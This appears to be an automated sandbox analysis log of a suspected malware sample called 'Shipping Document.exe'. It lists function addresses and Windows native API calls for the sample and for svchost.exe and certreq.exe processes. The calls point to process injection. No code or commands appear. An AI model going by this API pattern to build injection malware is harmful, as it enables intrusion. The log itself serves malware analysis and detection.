Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073D70 NtOpenThread,	2_2_03073D70
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055835C0 NtCreateMutant,LdrInitializeThunk,	4_2_055835C0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05584650 NtSuspendThread,LdrInitializeThunk,	4_2_05584650
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05584340 NtSetContextThread,LdrInitializeThunk,	4_2_05584340
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_05582D10
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_05582D30
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582DD0 NtDelayExecution,LdrInitializeThunk,	4_2_05582DD0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_05582DF0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_05582C70
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582C60 NtCreateKey,LdrInitializeThunk,	4_2_05582C60
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_05582CA0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582F30 NtCreateSection,LdrInitializeThunk,	4_2_05582F30
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582FE0 NtCreateFile,LdrInitializeThunk,	4_2_05582FE0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582FB0 NtResumeThread,LdrInitializeThunk,	4_2_05582FB0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_05582EE0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_05582E80
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055839B0 NtGetContextThread,LdrInitializeThunk,	4_2_055839B0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582B60 NtClose,LdrInitializeThunk,	4_2_05582B60
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_05582BF0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_05582BE0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_05582BA0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582AD0 NtReadFile,LdrInitializeThunk,	4_2_05582AD0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582AF0 NtWriteFile,LdrInitializeThunk,	4_2_05582AF0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05583010 NtOpenDirectoryObject,	4_2_05583010
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05583090 NtSetValueKey,	4_2_05583090
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05583D70 NtOpenThread,	4_2_05583D70
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05583D10 NtOpenProcessToken,	4_2_05583D10
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582D00 NtSetInformationFile,	4_2_05582D00
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582DB0 NtEnumerateKey,	4_2_05582DB0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582C00 NtQueryInformationProcess,	4_2_05582C00
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582CC0 NtQueryVirtualMemory,	4_2_05582CC0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582CF0 NtOpenProcess,	4_2_05582CF0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582F60 NtCreateProcessEx,	4_2_05582F60
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582F90 NtProtectVirtualMemory,	4_2_05582F90
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582FA0 NtQuerySection,	4_2_05582FA0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582E30 NtWriteVirtualMemory,	4_2_05582E30
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582EA0 NtAdjustPrivilegesToken,	4_2_05582EA0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582B80 NtQueryInformationFile,	4_2_05582B80
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05582AB0 NtWaitForSingleObject,	4_2_05582AB0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F47710 NtCreateFile,	4_2_02F47710
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F47B30 NtAllocateVirtualMemory,	4_2_02F47B30
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F47870 NtReadFile,	4_2_02F47870
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F479E0 NtClose,	4_2_02F479E0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F47950 NtDeleteFile,	4_2_02F47950

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_01024021: CreateFileW,DeviceIoControl,CloseHandle,

1_2_01024021

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_01018858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

1_2_01018858

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_0102545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

1_2_0102545F

Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FCE800	1_2_00FCE800
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FEDBB5	1_2_00FEDBB5
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FCE060	1_2_00FCE060
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_0104804A	1_2_0104804A
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FD4140	1_2_00FD4140
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FE2405	1_2_00FE2405
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FF6522	1_2_00FF6522
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FF267E	1_2_00FF267E
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01040665	1_2_01040665
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FD6843	1_2_00FD6843
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FE283A	1_2_00FE283A
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FF89DF	1_2_00FF89DF
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_0101EB07	1_2_0101EB07
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01028B13	1_2_01028B13
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FF6A94	1_2_00FF6A94
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FD8A0E	1_2_00FD8A0E
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01040AE2	1_2_01040AE2
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FECD61	1_2_00FECD61
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FF7006	1_2_00FF7006
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FD3190	1_2_00FD3190
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FD710E	1_2_00FD710E
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FC1287	1_2_00FC1287
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FE33C7	1_2_00FE33C7
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FEF419	1_2_00FEF419
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FE16C4	1_2_00FE16C4
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FD5680	1_2_00FD5680
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FE78D3	1_2_00FE78D3
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FD58C0	1_2_00FD58C0
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FE1BB8	1_2_00FE1BB8
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FF9D05	1_2_00FF9D05
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FCFE40	1_2_00FCFE40
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FEBFE6	1_2_00FEBFE6
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FE1FD0	1_2_00FE1FD0
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01E53680	1_2_01E53680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403040	2_2_00403040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040F873	2_2_0040F873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042D0B3	2_2_0042D0B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401190	2_2_00401190
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041619E	2_2_0041619E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004161A3	2_2_004161A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004022C0	2_2_004022C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401AFB	2_2_00401AFB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FA93	2_2_0040FA93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004022BA	2_2_004022BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401B00	2_2_00401B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DB13	2_2_0040DB13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004024B0	2_2_004024B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA352	2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031003E6	2_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C02C0	2_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030100	2_2_03030100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C8158	2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F41A2	2_2_030F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031001AA	2_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F81CC	2_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064750	2_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303C7C0	2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305C6E0	2_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03100591	2_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4420	2_2_030E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F2446	2_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EE4F6	2_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FAB40	2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F6BD7	2_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310A9A6	2_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304A840	2_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03042840	2_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030268B8	2_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E8F0	2_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03082F28	2_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060F30	2_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E2F30	2_2_030E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4F40	2_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BEFA0	2_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032FC8	2_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304CFE0	2_2_0304CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FEE26	2_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040E59	2_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052E90	2_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FCE93	2_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FEEDB	2_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304AD00	2_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DCD1F	2_2_030DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03058DBF	2_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303ADE0	2_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040C00	2_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0CB5	2_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030CF2	2_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F132D	2_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302D34C	2_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0308739A	2_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030452A0	2_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305B2C0	2_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E12ED	2_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307516C	2_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302F172	2_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310B16B	2_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304B1B0	2_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EF0CC	2_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030470C0	2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F70E9	2_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF0E0	2_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF7B0	2_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03085630	2_2_03085630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F16CC	2_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7571	2_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DD5B0	2_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031095C3	2_2_031095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF43F	2_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03031460	2_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFB76	2_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305FB80	2_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B5BF0	2_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307DBF9	2_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFA49	2_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7A46	2_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B3A6C	2_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DDAAC	2_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03085AA0	2_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E1AA3	2_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EDAC6	2_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D5910	2_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03049950	2_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305B950	2_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AD800	2_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030438E0	2_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFF09	2_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03041F92	2_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFFB1	2_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03003FD2	2_2_03003FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03003FD5	2_2_03003FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03049EB0	2_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03043D40	2_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F1D5A	2_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7D73	2_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305FDC0	2_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B9C32	2_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFCF2	2_2_030FFCF2
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05607571	4_2_05607571
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05550535	4_2_05550535
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055ED5B0	4_2_055ED5B0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05610591	4_2_05610591
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05602446	4_2_05602446
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05541460	4_2_05541460
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0560F43F	4_2_0560F43F
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055FE4F6	4_2_055FE4F6
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05574750	4_2_05574750
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05550770	4_2_05550770
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0554C7C0	4_2_0554C7C0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0560F7B0	4_2_0560F7B0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_056016CC	4_2_056016CC
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0556C6E0	4_2_0556C6E0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055D8158	4_2_055D8158
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0561B16B	4_2_0561B16B
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0553F172	4_2_0553F172
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0558516C	4_2_0558516C
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055EA118	4_2_055EA118
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05540100	4_2_05540100
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_056081CC	4_2_056081CC
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_056101AA	4_2_056101AA
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0555B1B0	4_2_0555B1B0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0560F0E0	4_2_0560F0E0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_056070E9	4_2_056070E9
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055FF0CC	4_2_055FF0CC
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055570C0	4_2_055570C0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0553D34C	4_2_0553D34C
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0560A352	4_2_0560A352
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0560132D	4_2_0560132D
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_056103E6	4_2_056103E6
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0555E3F0	4_2_0555E3F0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0559739A	4_2_0559739A
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055F0274	4_2_055F0274
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0556B2C0	4_2_0556B2C0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055D02C0	4_2_055D02C0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055F12ED	4_2_055F12ED
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055552A0	4_2_055552A0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05607D73	4_2_05607D73
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05553D40	4_2_05553D40
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05601D5A	4_2_05601D5A
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0555AD00	4_2_0555AD00
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0556FDC0	4_2_0556FDC0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0554ADE0	4_2_0554ADE0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05568DBF	4_2_05568DBF
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05550C00	4_2_05550C00
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055C9C32	4_2_055C9C32
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0560FCF2	4_2_0560FCF2
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05540CF2	4_2_05540CF2
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055F0CB5	4_2_055F0CB5
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055C4F40	4_2_055C4F40
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05570F30	4_2_05570F30
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0560FF09	4_2_0560FF09
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05592F28	4_2_05592F28
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05542FC8	4_2_05542FC8
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0555CFE0	4_2_0555CFE0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05551F92	4_2_05551F92
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0560FFB1	4_2_0560FFB1
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055CEFA0	4_2_055CEFA0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05550E59	4_2_05550E59
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0560EE26	4_2_0560EE26
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0560EEDB	4_2_0560EEDB
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05562E90	4_2_05562E90
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05559EB0	4_2_05559EB0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0560CE93	4_2_0560CE93
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05559950	4_2_05559950
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0556B950	4_2_0556B950
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05566962	4_2_05566962
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0561A9A6	4_2_0561A9A6
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055529A0	4_2_055529A0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05552840	4_2_05552840
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0555A840	4_2_0555A840
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055BD800	4_2_055BD800
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0557E8F0	4_2_0557E8F0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055538E0	4_2_055538E0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055368B8	4_2_055368B8
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0560FB76	4_2_0560FB76
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0560AB40	4_2_0560AB40
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0558DBF9	4_2_0558DBF9
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055C5BF0	4_2_055C5BF0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05606BD7	4_2_05606BD7
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0556FB80	4_2_0556FB80
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05607A46	4_2_05607A46
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0560FA49	4_2_0560FA49
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055C3A6C	4_2_055C3A6C
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055FDAC6	4_2_055FDAC6
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_0554EA80	4_2_0554EA80
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_055EDAAC	4_2_055EDAAC
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_05595AA0	4_2_05595AA0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F313A0	4_2_02F313A0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F2C7D0	4_2_02F2C7D0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F2C5B0	4_2_02F2C5B0
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F2A850	4_2_02F2A850
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F32EE0	4_2_02F32EE0
